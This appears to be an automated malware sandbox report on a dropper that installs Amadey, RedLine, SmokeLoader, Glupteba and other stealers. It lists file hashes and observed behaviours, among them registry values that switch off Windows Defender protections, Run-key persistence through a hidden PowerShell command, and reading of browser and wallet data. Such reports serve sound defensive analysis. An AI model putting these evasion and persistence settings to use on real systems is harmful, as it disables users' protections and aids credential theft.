SHA256 3cd764597c232962f0c51074b34e3908766546f60c10a798ffb26472741c171d
SHA512 9c90517a6aae565021e9884fae53410024cf81515dd291b5ecb24a08cb5c956e8b6e1e4dca2e98fb8f0c2b45ba7e1bceacc9de63a3eaadd7f81bc13642232c9b

C:\Users\Admin\AppData\Local\Temp\CE77.exe

MD5 53e28e07671d832a65fbfe3aa38b6678
SHA1 6f9ea0ed8109030511c2c09c848f66bd0d16d1e1
SHA256 5c59db3277aefb761d4b814aaf5f5acd1fd1a0ea154dc565c78b082a3df4566e
SHA512 053f8048230583e741c34f6714c9684ed1312c064cd0c81d99f09e20192b7ddecb53c9c55e4aceac774315315be7e13de98f2cea4e5487f2d9e9dfa2ce3979c9

C:\Users\Admin\AppData\Local\Temp\CE77.exe

MD5 53e28e07671d832a65fbfe3aa38b6678
SHA1 6f9ea0ed8109030511c2c09c848f66bd0d16d1e1
SHA256 5c59db3277aefb761d4b814aaf5f5acd1fd1a0ea154dc565c78b082a3df4566e
SHA512 053f8048230583e741c34f6714c9684ed1312c064cd0c81d99f09e20192b7ddecb53c9c55e4aceac774315315be7e13de98f2cea4e5487f2d9e9dfa2ce3979c9

\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

MD5 3641071efe1a30b67294a55ee79f934f
SHA1 d834444c92009bb761dbc1bbd1ddb0371d0d0e56
SHA256 498c493a3a45eb27c9fc7826ee2a9a8bbca6d062815570feb8480718043d231e
SHA512 60da4666b9fa4ae934c3952ec786bc9ad2d37a5cdafb70120ad2661ef30d80c5102fe0041269d3303df7e19cd60ada00e90210626c1b76ce746780444c0d2a3f

\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

MD5 3641071efe1a30b67294a55ee79f934f
SHA1 d834444c92009bb761dbc1bbd1ddb0371d0d0e56
SHA256 498c493a3a45eb27c9fc7826ee2a9a8bbca6d062815570feb8480718043d231e
SHA512 60da4666b9fa4ae934c3952ec786bc9ad2d37a5cdafb70120ad2661ef30d80c5102fe0041269d3303df7e19cd60ada00e90210626c1b76ce746780444c0d2a3f

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

MD5 3641071efe1a30b67294a55ee79f934f
SHA1 d834444c92009bb761dbc1bbd1ddb0371d0d0e56
SHA256 498c493a3a45eb27c9fc7826ee2a9a8bbca6d062815570feb8480718043d231e
SHA512 60da4666b9fa4ae934c3952ec786bc9ad2d37a5cdafb70120ad2661ef30d80c5102fe0041269d3303df7e19cd60ada00e90210626c1b76ce746780444c0d2a3f

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

MD5 3641071efe1a30b67294a55ee79f934f
SHA1 d834444c92009bb761dbc1bbd1ddb0371d0d0e56
SHA256 498c493a3a45eb27c9fc7826ee2a9a8bbca6d062815570feb8480718043d231e
SHA512 60da4666b9fa4ae934c3952ec786bc9ad2d37a5cdafb70120ad2661ef30d80c5102fe0041269d3303df7e19cd60ada00e90210626c1b76ce746780444c0d2a3f

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

MD5 6397d349c83f36262eaf7ff38be3b602
SHA1 65bfb346c9b44360bbd703c8d40ae6c041efcd41
SHA256 703c6975e1372dad6b18fa3c1b5b2b362b393293f9fe0338486baebabf689aae
SHA512 ad8fbb1ea8ea7f1afe19566900bfedc3934a4e31612295b9f8bc59e9b04035acc80815395b3a0eb5d823ac1d38a6d8ee5de125216ae562a15d7ae9bfde12a68c

\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

MD5 6397d349c83f36262eaf7ff38be3b602
SHA1 65bfb346c9b44360bbd703c8d40ae6c041efcd41
SHA256 703c6975e1372dad6b18fa3c1b5b2b362b393293f9fe0338486baebabf689aae
SHA512 ad8fbb1ea8ea7f1afe19566900bfedc3934a4e31612295b9f8bc59e9b04035acc80815395b3a0eb5d823ac1d38a6d8ee5de125216ae562a15d7ae9bfde12a68c

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

MD5 6397d349c83f36262eaf7ff38be3b602
SHA1 65bfb346c9b44360bbd703c8d40ae6c041efcd41
SHA256 703c6975e1372dad6b18fa3c1b5b2b362b393293f9fe0338486baebabf689aae
SHA512 ad8fbb1ea8ea7f1afe19566900bfedc3934a4e31612295b9f8bc59e9b04035acc80815395b3a0eb5d823ac1d38a6d8ee5de125216ae562a15d7ae9bfde12a68c

C:\Users\Admin\AppData\Local\Temp\CF91.bat

MD5 403991c4d18ac84521ba17f264fa79f2
SHA1 850cc068de0963854b0fe8f485d951072474fd45
SHA256 ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f
SHA512 a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576

\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe

MD5 0477577e26ce43d9184a0fa4fc11708c
SHA1 978b6e2792498f044e84093373faad975e3ad8a1
SHA256 b0b45b87c19b8784399bbc2b9ec7c0928e989f9a5867b6fecddd7ff8241e8865
SHA512 c08bac5e47a1855319e468568d50b5dc17254e541a497c8f0e4a3dfba23bbc88a5ed0806af2400d3412c9c5889c0128cfde8bcc187606eb9f597bebac9d6f34d

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\4gx493Mv.exe

MD5 8905918bd7e4f4aeda3a804d81f9ee40
SHA1 3c488a81539116085a1c22df26085f798f7202c8
SHA256 0978a728ad05915e0be6a7283d30acca18893ef7a4b0939d316de70415e0efde
SHA512 6530c4209651aa34f4c91fe5b737dc933f02a8ea3710a6f3fa0bff3130720740de4bec308b35cb31255cec6c85e585036af849ace6e6268ef1d9f9a761fe6a56

\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe

MD5 981a5d746ea0e3c217e696047d948759
SHA1 33bae39996060cd0baeb40365fdf7725673b7756
SHA256 99778e0597818638fa7950140cc341d35160f8c7850042a1a46aa841ee941151
SHA512 a40c1f68e96e377bf00ae4e24d478a751bc274001c11d56aac7029fbfaa1e6a27975e04dca4b23319353bebf5c5790a12ebe772f84729abe59d11899167e5c94

\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe

MD5 53e28e07671d832a65fbfe3aa38b6678
SHA1 6f9ea0ed8109030511c2c09c848f66bd0d16d1e1
SHA256 5c59db3277aefb761d4b814aaf5f5acd1fd1a0ea154dc565c78b082a3df4566e
SHA512 053f8048230583e741c34f6714c9684ed1312c064cd0c81d99f09e20192b7ddecb53c9c55e4aceac774315315be7e13de98f2cea4e5487f2d9e9dfa2ce3979c9

C:\Users\Admin\AppData\Local\Temp\D32A.exe

MD5 8905918bd7e4f4aeda3a804d81f9ee40
SHA1 3c488a81539116085a1c22df26085f798f7202c8
SHA256 0978a728ad05915e0be6a7283d30acca18893ef7a4b0939d316de70415e0efde
SHA512 6530c4209651aa34f4c91fe5b737dc933f02a8ea3710a6f3fa0bff3130720740de4bec308b35cb31255cec6c85e585036af849ace6e6268ef1d9f9a761fe6a56

\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

MD5 e5be97d623a9881fe8343268130d93c0
SHA1 3846d78e204ca69062d186b2b90c32ed404ec8c7
SHA256 9598a30e7f800bbbfd1da421f7d1ac616b399620f23257bce78f13ed1c9c225e
SHA512 84f9b3e0540b67c1591b88f9f2a972b3fac868e952404cbc7ed626ec844ff67a2119f4d162d1804678288ccc8b892de7a87b4fa7020bb5ff2b97b6ae84e2f85e

C:\Users\Admin\AppData\Local\Temp\D6C4.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\DFDA.exe

MD5 b9fbf1ffd7f18fa178219df9e5a4d7f9
SHA1 be2d63df44dbbb754fc972e18adf9d56a1adcce4
SHA256 07c4357e3f13e6603800a36e787d3c2aa1f73bf94185a8ac8de727986ab3799f
SHA512 ec1687d97497a91c75ac1cb7c121bd7e4545d32dcc196c916e0c97ac1b8e4472bee15685cea7e7e174f22467766bdff8268ea57c05e40ce0ddde9d03c1b223e8

C:\Users\Admin\AppData\Local\Temp\Cab56F.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar60E.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 e5bbfaa96a70b5c2316d1befe5a1b85c
SHA1 399a478e94abf553332d11c18b9f88894ecaeabe
SHA256 b9cdd487fdc7773bcf203bbca8704b57f653c01d413d48c4752dbc868be3fb30
SHA512 bbbac2e91e289a0d8ca23f372577a8f7ce602981b5f4347a314ec185cbdfff2115e39e5c1f72dda704f098157e3b3bde9621db38ecad5c3e99ec189b89358450

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 0bce2fed456a72a2486b1d17621c88d6
SHA1 4cbff382f76920526ec0bc81a05bfd372dd88229
SHA256 09d0729bea75ff6d7c859ccfc3ef3c2797b65b51f8de8ed7fe5933cde93c778b
SHA512 74c7acefa56cad28b8a503ffe65ec78ea44f16d2ace99b40ef357e4142b89703e20f35062782bcab5d3b602d65206a0689e054dbd9cb19cf5be499627346e1a4

C:\Users\Admin\AppData\Local\Temp\1A9D.exe

MD5 42d97769a8cfdfedac8e03f6903e076b
SHA1 01c6791e564bdbc0e7c6e2fdbdf4fdadc010ffbe
SHA256 f9670a844453e56898ed4c23afe57dfa2cd20f28ae8e97df4c7304371e1b179b
SHA512 38d2ae5ded48543d8ceb4c4a2a7ebd3287c4b720fe4133080f64e9ebd4403e8ee66301885c20164c9b4fb48536a107fd21f03689332685fcd3214075feadbd77

C:\Users\Admin\AppData\Local\Temp\27C8.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\30CE.exe

MD5 d5752c23e575b5a1a1cc20892462634a
SHA1 132e347a010ea0c809844a4d90bcc0414a11da3f
SHA256 c5fe2da1631fc00183d774e19083e5bb472779e8e5640df7a939b30da28863fb
SHA512 ae23ef6b5f6566384411343596a11242b0b3d4ae51f4c8f575c8b011ee59ecfde92f7b73352240d1113f7594a3f3f87b488d98b53908e27cdd4523b65613e9e8

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VIHCRIESJTOZR25MB6F5.temp

MD5 eb91b0fbed11cc81d3e8c45326e368f1
SHA1 a43b4d763b98177fae41aaa3aee623e79a367d9b
SHA256 0c5925594806fd4de55bb39979a6253fd9cdfa1a4d9d5c277d8f12cbb7a5d633
SHA512 3e88b51731b1c55bfcc56900cd315c7d2797447336e4140241cf3a0e0544ab8999e55a68a80941495708ae2b2b237089c93f1851d0927681f411ff399d79920e

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-19 13:03

Reported

2023-10-19 13:05

Platform

win10v2004-20230915-en

Max time kernel

101s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Glupteba

loader dropper glupteba

Glupteba payload

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A

RedLine

infostealer redline

RedLine payload

SectopRAT

trojan rat sectoprat

SectopRAT payload

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor protector

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\A6FE.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9D.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9F58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A0FF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A46C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A6FE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A98F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AAB9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AEB2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B952.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4F3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5DE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B1F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\A5C5.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\5DE.exe'\"" C:\Users\Admin\AppData\Local\Temp\5DE.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\9F58.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand microsoft.

phishing microsoft

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4472 set thread context of 1876 N/A C:\Users\Admin\AppData\Local\Temp\B952.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 5372 set thread context of 5864 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
